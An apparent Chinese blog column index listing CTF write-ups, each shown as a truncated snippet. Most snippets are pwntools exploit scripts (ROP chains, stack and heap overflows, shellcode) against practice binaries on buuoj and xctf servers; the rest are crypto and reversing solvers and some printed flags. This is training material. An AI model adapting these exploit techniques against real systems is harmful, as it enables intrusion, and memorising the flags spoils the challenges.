pondzhang的专栏

原创 羊城杯 2020 Bytecode

羊城杯 2020 Bytecode恢复的代码块def test(): en = [3,37,72,9,6,132] output = [101,96,23,68,112,42,107,62,96,53,176,179,98,53,67,29,41,120,60,106,51,101,178,189,101,48] print(b'welcome to GWHT2020') flag = 'GWHT{fc2a8bb7f347a6f8a05c5c69f3aeff73}'

原创 GKCTF2021 checkin

from pwn import *context.log_level='debug'p = process('./login')elf = ELF('./login')libc = elf.libcputs_func = 0x00000000004018B5puts_got = 0x0000000000602028pop_rdi_ret = 0x0000000000401ab3main = 0x0000000000401A2Abss = 0x0000000000602400p.recv.

原创 pwnable_start

from pwn import *loacl_elf = ELF("./start")context.arch = loacl_elf.arch#p = process("./start")p = remote("node3.buuoj.cn",28802)#gdb.attach(p, 'b* 0x08048060')#shellcode=asm(shellcraft.sh())shellcode = asm("xor ecx,ecx;\ xor edx,.

原创 BJDCTF 2nd secret

from pwn import *p = remote('node3.buuoj.cn',27231)elf = ELF("./secret")p.recvuntil("# What's your name? _")payload = '/bin/sh\x00\x00\x00\x00\x00\x00\x00\x00\x00' + p32(elf.got['printf'])p.sendline(payload) answer = [0x476B,0x2D38,0x4540,0x3E77.

原创 cmcc pwnme1

from pwn import *from LibcSearcher import LibcSearcher#p = process('./pwnme1')p = remote("node3.buuoj.cn",29175)elf = ELF('./pwnme1')plt_puts = elf.plt['puts']got_puts = elf.got['puts']main = elf.symbols["main"]getfruit_addr = 0x08048624payload =.

原创 cmcc pwnme2

from pwn import *#p = process('./pwnme2')p = remote("node3.buuoj.cn",26522)libc = ELF('./libc-2.23.so')plt_puts = 0x08048490got_puts = 0x0804A028main = 0x080486F8payload = 108*'a' + p32(0xdeadbeaf) + p32(plt_puts) + p32(main) + p32(got_puts).

原创 xctf reversing2

a = [0xBB, 0xCC, 0xA0, 0xBC, 0xDC, 0xD1, 0xBE, 0xB8, 0xCD, 0xCF, 0xBE, 0xAE, 0xD2, 0xC4, 0xAB, 0x82, 0xD2, 0xD9, 0x93, 0xB3, 0xD4, 0xDE, 0x93, 0xA9, 0xD3, 0xCB, 0xB8, 0x82, 0xD3, 0xCB, 0xBE, 0xB9, 0x9A, 0xD7, 0xCC,0xDD]b = [0xBB, 0xAA, 0xCC, 0xDD]for .

原创 xctf no-strings-attached

a = [0x143A, 0x1436, 0x1437, 0x143B, 0x1480, 0x147A, 0x1471, 0x1478, 0x1463, 0x1466, 0x1473, 0x1467 , 0x1462, 0x1465, 0x1473, 0x1460, 0x146B, 0x1471, 0x1478, 0x146A, 0x1473, 0x1470, 0x1464, 0x1478, 0x146E, 0x1470, 0x1470, 0x1464,.

原创 xctf level3

from pwn import *#p = process(['./level3'],env={"LD_PRELOAD":"./libc_32.so.6"})p = remote("220.249.52.134",36907)libc = ELF("./libc_32.so.6")write_plt = 0x08048340write_got = 0x0804A018main = 0x0804844B#p = remote("220.249.52.133",54612)p.recvun.

原创 xctf embarrass

原创 xctf int_overflow

from pwn import *#p = process('./int_overflow')p = remote("220.249.52.133",54612)p.recvuntil('Your choice:')p.sendline('1')p.recvuntil('username:\n')p.sendline('1')p.recvuntil('passwd:\n')payload = '\x04'*24 + p32(0x0804868B) + 'c'*(260-28)#gdb.

原创 xctf guess_num

from pwn import *#p = process('./guess_num')p = remote("220.249.52.133",41750)p.recvuntil('Your name:')payload = 'a'*32 + p64(1)#gdb.attach(p,'b* rebase(0x0000000000000D2B)')p.sendline(payload)p.recvuntil('number:')p.sendline('2')p.recvuntil('nu.

原创 xctf string

from pwn import *#p = process('./string')p = remote("220.249.52.133",37754)p.recvuntil('secret[0] is ')addr = int(p.recv(7),16)log.sucess(hex(addr))p.recvuntil("name be:\n")p.sendline('test')p.recvuntil('east or up?:\n')p.sendline('east')p.recv.

原创 0ctf2017 babyheap

from pwn import *#p = process(['./0ctf_2017_babyheap'],env={"LD_PRELOAD":"./libc-2.23.so"})p = remote("node3.buuoj.cn",26165)elf = ELF('./0ctf_2017_babyheap')libc = ELF("./libc-2.23.so")def Allocate(size): p.recvuntil('Command: ') p.sendl.

原创 buu hacknote

from pwn import *#p = process('./hacknote')p = remote("node3.buuoj.cn",29460)got_atoi = 0x0804A034#elf = ELF('./hacknote')#libc = elf.libclibc = ELF('./libc-2.23.so')def Add(size,context): p.recvuntil('Your choice :') p.sendline('1') p....

原创 buu equation

F12去标识：from z3 import *S = Solver()l = IntVector('l', 42)S.add(l[40]+l[35]+l[34]-l[0]-l[15]-l[37]+l[7]+l[6]-l[26]+l[20]+l[19]+l[8]-l[17]-l[14]-l[38]+l[1]-l[9]+l[22]+l[41]+l[3]-l[29]-l[36]-l[25]+l[5]+l[32]-l[16]+l[12]-l[24]+l[30]+l[39]+l[10]+l[2]+l[2

原创 UTCTF2020 basic-re

原创 DDCTF2018 流量分析

=E4=BD=A0=E5=A5=BD=EF=BC=8C=E8=AF=B7=E4=BD=A0=E5=B0=86=E5=AF=86=E9=92=A5=E5=AE=89=E8=A3=85=E5=88=B0=E6=9C=8D=E5=8A=A1=E5=99=A8=E4=B8=8A=E3=80=82=E8=B0=A2=E8=B0=A2解码为“你好，请你将密钥安装到服务器上。谢谢”获得privatekey为-----BEGIN RSA PRIVATE KEY-----MIICXAIBAAKBgQDCm6vZm

原创 WUSTCTF2020 level4

已知树的中序和后序遍历，求先序遍历Traversal type 1:2f0t02T{hcsiI_SwA__r7Ee} 中序Traversal type 2:20f0Th{2tsIS_icArE}e7__w 后序绘图如下先序遍历为wctf2020{This_IS_A_7reE}

原创 ropemporium新通关脚本

1）ret2win32from pwn import *catflag = 0x0804862Cp = process('./ret2win32')payload = 'A'*0x28 + p32(0) + p32(catflag) p.recvuntil('> ')p.send(payload)p.interactive()2）ret2winfrom pwn import *catflag = 0x0000000000400756p = process('./ret2win'

原创 SUCTF2019 MT

from Crypto.Random import randomfrom Crypto.Util import numberdef convert(m): m = m ^ m >> 13 m = m ^ m << 9 & 2029229568 m = m ^ m << 17 & 2245263360 m = m ^ m >> 19 return mdef transform(message):

原创 FlareOn4 login

var flag = "PyvragFvqrYbtvafNerRnfl@syner-ba.pbz";var rotFlag = flag.replace(/[a-zA-Z]/g, function(c){return String.fromCharCode((c <= "Z" ? 90 : 122) >= (c = c.charCodeAt(0) + 13) ? c : c - 26);});alert(rotFlag);

原创 SWPU2019 Network

f = open("attachment.txt","r")s = ''tmp = ''while 1: num = f.readline() if not num: break if num.rstrip() == '63': tmp = '00' elif num.rstrip() == '127': tmp = '01' elif num.rstrip() == '191': tmp = '.

原创 buuoj 百里挑一

tcp流114和其他有明显区别，并且提示有exif初步考虑有exiftool工具，通过导出对象图片检测exiftool * | grep flag恭喜你！找到一半了，还有另一半哦！flag{ae58d0408e26e8f再将流114手工导出保存为图片（该图片格式不标准，无法自动导出）exiftool 1.jpgExifTool Version Number : 10.10File Name : 1.jpgDirectory

原创 GKCTF2020 小学生的密码学

import gmpy2import stringimport base64m = gmpy2.invert(11,26)table = string.ascii_lowercaseprint tablesecrt = "welcylk"plain = ''for i in secrt: x = table.index(i) j = (x-6)*m%26 print j plain += table[j]print plainprint base64

原创 hitcontraining magicheap

from pwn import *magic = 0x00000000006020A0#p = process('./magicheap')p = remote("node3.buuoj.cn",26020)def CreateHeap(size,content): p.sendlineafter('Your choice :','1') p.sendlineafter('Size of Heap : ',str(size)) p.sendlineafter('Content of heap:

原创 ciscn2019 pwn3

from pwn import *p = process("./ciscn_2019_n_3")elf = ELF('./ciscn_2019_n_3')def do_new_text(idx, lens, content): p.sendlineafter("CNote > ", '1') p.sendlineafter("Index > ", str(idx)) p.sendlineafter("Type > ", '2') p.sendlin

原创 cmcc simplerop

from pwn import *p = process('./simplerop')p.recv()int80_addr = 0x080493e1pop_eax = 0x080bae06read = 0x0806CD50binsh = 0x080EB584pop_edx_ecx_ebx = 0x0806e850payload = 'a'*0x20 + p32(read) + p32(pop_edx_ecx_ebx) + p32(0) + p32(binsh) + p32(0x8)payl

原创 bjdctf2020 babyrop2

from pwn import *p = process('bjdctf_2020_babyrop2')libcelf = ELF('/lib/x86_64-linux-gnu/libc.so.6')poprdiret = 0x0000000000400993main = 0x00000000004008DA pltputs = 0x0000000000400610gotputs = 0x0000000000601018p.sendlineafter("I'll give u some gif

原创 MRCTF2020 babyRSA

import sympyimport gmpy2Q_1= 103766439849465588084625049495793857634556517064563488433148224524638105971161051763127718438062862548184814747601299494052813662851459740127499557785398714481909461631996020048315790167967699932967974484481209879664173009

原创 V&N2020 simpleHeap

# coding:utf-8from pwn import *context(os='linux', arch='amd64', log_level='debug')p = process('./vn_pwn_simpleHeap')def add(size, content): p.sendlineafter("choice: ", '1') p.sendlineafter("size?", str(size)) p.sendlineafter("content:",

原创 WUSTCTF2020 大数计算

42 =(-80538738812075974)³+ 80435758145817515³+ 12602123297335631³ 生命、宇宙、万物的终极答案是42from sympy import *x = symbols('x')print(integrate(2*x, (x, 0, 22)))sum = 1for i in range(1,2021): sum = sum*iprint hex(int(str(sum)[:8],10))[2:]print hex(int(st

原创 ZJCTF 2019 Login

from pwn import *p = process('./login')p.sendlineafter("username: ","admin")payload = "2jctf_pa5sw0rd" + '\x00'*58 + p64(0x0000000000400E88)p.sendlineafter("password: ",payload)p.interactive()

原创 hitcontraining hacknote

from pwn import *p = process('./hacknote')def add(size, content): p.sendlineafter('Your choice :', '1') p.sendlineafter('Note size :', str(size)) p.sendlineafter('Content :', content)def delete(idx): p.sendlineafter('Your choice :', '2')

原创 bjdctf 2020 babystack2

from pwn import *p = process('./bjdctf_2020_babystack2')p.sendlineafter("length of your name:\n","-1")payload = 24*'a'+ p64(0x0000000000400893) + p64(0) + p64(0x0000000000400726)p.sendlineafter("name?\n",payload)p.interactive()

原创 buuoj RSA & what

RSA公模攻击+Base64隐写：import gmpy2from Crypto.Util.number import *n = 78509541971826828686650821430481698544707729376681939872804641116691781082048475931429102897649822366122939500947406317370516262703761099353961775190544303927822758350460480825193108381890

原创 RoarCTF2019 RSA

A=(((y%x)**5)%(x%y))**2019+y**316+(y+1)/xp=next_prime(z*x*y)q=next_prime(z)A = 26833491826787145242474695127934760098610147810049249054841274803081613777681928680615618865770486464323821289608814874634274141761144868858306939594049897432291035169244325

原创 SUCTF2019 SignIn RSA逆向

import gmpy2p=282164587459512124844245113950593348271q=366669102002966856876605669837014229419e=65537c=0xad939ff59f6e70bcbfad406f2494993757eee98b91bc244184a377520d06fc35n=p*qphin=(p-1)*(q-1)d=gmpy2.invert(e,phin)m=pow(c,d,n)print hex(m)[2:].decode

原创 buuoj EasyProgram

flag = open('file.txt','rb').readline()S=[]T=[]for i in range(256): S.append(i)key = "whoami"for i in range(256): T.append(ord(key[i%len(key)]))j = 0for i in range(256): j = (j+S[i]+T[i])%256 S[i],S[j] = S[j],S[i]i = 0j = 0x =

原创 ez_pz_hackover_2016

测试栈溢出偏移量from pwn import *p = process('./ez_pz_hackover_2016')libc = ELF('/lib/i386-linux-gnu/libc.so.6')elf = ELF('./ez_pz_hackover_2016')context.log_level = 'debug'context.arch = elf.archpayload = 'crashme\x00' + 'aaaabaaacaaadaaaeaaafaaagaaahaaai